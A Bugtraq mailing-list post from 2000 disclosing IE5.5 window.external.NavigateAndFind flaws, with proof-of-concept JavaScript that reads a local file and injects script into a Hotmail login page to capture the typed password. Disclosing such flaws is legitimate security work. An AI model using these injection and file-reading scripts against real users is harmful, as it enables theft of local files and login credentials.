Bugtraq mailing list archives
IE5.5 window.externalNavigateAndFind security vulnerability....
From: Alp Sinan <alp () UK2 NET>
Date: Sat, 30 Sep 2000 18:49:41 -0000
Multiple security vulnerabilities found in window.external.NavigateAndFind function in IE5.5... After the most recent patches applied the vulnerabilities seem to persist.. Actually there is no current issues discussed at microsft website... Microsoft has been notified about the problem via email.. Until now there is no response appearing. I wanted to inform security concerned people about the problem.. Vulnerability 1: window.external.NavigateAndFind function can Access local files provided that the local file name and path is known... the code :(the I in the script tag replaced with lowercase) <A href="javascr!pt:LinkClicked()">Show local file's Content</A> <SCRiPT> function LinkClicked() { b=window.open("file://C:/test.txt","local") setTimeout('Sniff()',1000); } function Sniff(){ window.external.NavigateAndFind("javascript:alert (document.body.innerText);","b","local"); } </SCRiPT> demonstration: http://www.horoznet.com/AlpSinan/navAL.htm vulnerability 2.window.external.NavigateAndFind function can access other windows DOM. editing the opened windows content, therefore code injection, possible. the code : <A href="javascript:LinkClicked()">Go to Hotmail </A> <scrIpt> function LinkClicked() { a=window.open ("http://lc2.law5.hotmail.passport.com/cgi- bin/login","new") setTimeout('Spoof()',20000);// you may modify the timeout.... } function Spoof(){ window.external.NavigateAndFind ("javascript:document.write (''+document.body.outerHTML+'<scrIpt>document.pa sswordform.onsubmit=ShowPass;function ShowPass(){alert(\"Your Password is: \n \"+document.passwordform.passwd.value)};window.f ocus();</sc'+'rIpt>');alert('The code has been injected right now.');","a","new"); } </scrIpt> demonstration: http://www.horoznet.com/AlpSinan/navCI.htm vulnerability 3. IE5.5 can execute the plain text files' javascript or VBscript content... demonstration: http://www.horoznet.com/AlpSinan/execlocal.htm Precautions or workarounds might be disabling javascript or using caution while clicking the links in untrusted webpages as well as popup windows. Alp Sinan
Current thread:
- IE5.5 window.externalNavigateAndFind security vulnerability.... Alp Sinan (Sep 30)